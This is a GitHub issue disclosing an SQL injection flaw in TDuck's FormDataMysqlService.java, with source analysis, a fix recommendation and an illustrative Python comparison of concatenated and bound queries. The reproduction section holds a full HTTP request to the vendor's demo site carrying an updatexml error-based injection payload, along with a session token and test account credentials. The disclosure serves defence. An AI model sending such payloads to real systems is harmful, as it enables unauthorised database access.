
[vulnerability] Back-office management statistics function SQL injection in FormDataMysqlService.java #22

Open
shellfeel opened this issue Dec 19, 2023 · 0 comments


1. Steps to reproduce

1. Use the demo environment on the official website (https://demo.tduckapp.com/project) for verification, and register a user with the registration function (1b7pl_dp@linshiyouxiang.net/123456).

[image]

2. Log in and construct the following request, replacing the Token header with the login token of the registered user; the value of the formKey parameter is the malicious injection statement.

POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}

3. An SQL error page is produced and user() is successfully echoed back; the vulnerability is verified.

[image]

2. Source code analysis of the vulnerability

The corresponding search method in FormDataMysqlService.java applies no restriction to the formKey parameter passed in from the request; it is concatenated directly into the SQL that is executed.
[image]

3. Affected version

This SQLi affects the latest current version (v4.0).

4. Fix recommendations

Use precompiled bound parameters.
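As an added illustration of the flaw and the recommended fix (not the project's code; Python with an in-memory SQLite table stands in for the Java service and MySQL), the following shows how the formKey value from the report is read as SQL when spliced into the query text, while the same value passed as a bound parameter is only ever compared as data. Table and column names are assumed.

```python
import sqlite3

# Constructed sample rows standing in for the form data table (names assumed).
SAMPLE_ROWS = [
    ("MVWB25aE", '{"q1": "yes"}'),
    ("MVWB25aE", '{"q1": "no"}'),
    ("OTHERKEY", '{"q1": "maybe"}'),
]

# The formKey value from the report. The leading quote closes the SQL string
# literal, so everything after it is parsed as SQL rather than as a key.
INJECTED_FORM_KEY = "MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fm_form_data (form_key TEXT, original_data TEXT)")
    conn.executemany("INSERT INTO fm_form_data VALUES (?, ?)", SAMPLE_ROWS)
    return conn

def spliced_sql(form_key):
    # The flaw the report describes: the request value becomes part of the SQL text.
    return "SELECT original_data FROM fm_form_data WHERE form_key = '" + form_key + "'"

def query_concatenated(conn, form_key):
    return [row[0] for row in conn.execute(spliced_sql(form_key))]

def query_bound(conn, form_key):
    # The recommended fix: the value is sent as a bound parameter and can only
    # be compared as data, whatever characters it contains.
    sql = "SELECT original_data FROM fm_form_data WHERE form_key = ?"
    return [row[0] for row in conn.execute(sql, (form_key,))]

def demo():
    conn = make_db()
    results = {
        "bound_normal": query_bound(conn, "MVWB25aE"),
        "bound_injected": query_bound(conn, INJECTED_FORM_KEY),
    }
    try:
        # SQLite has no updatexml()/user(), so it rejects the injected text;
        # the point is that the engine tried to run it as SQL at all.
        query_concatenated(conn, INJECTED_FORM_KEY)
        results["concat_injected"] = "executed"
    except sqlite3.Error as exc:
        results["concat_injected"] = "error: " + str(exc)
    return results

if __name__ == "__main__":
    print(spliced_sql(INJECTED_FORM_KEY))
    print(demo())
```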

shellfeel changed the title from "[vulnerability] Backend statistics function sql injection in FormDataMysqlService.java" to "[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java" on Dec 19, 2023.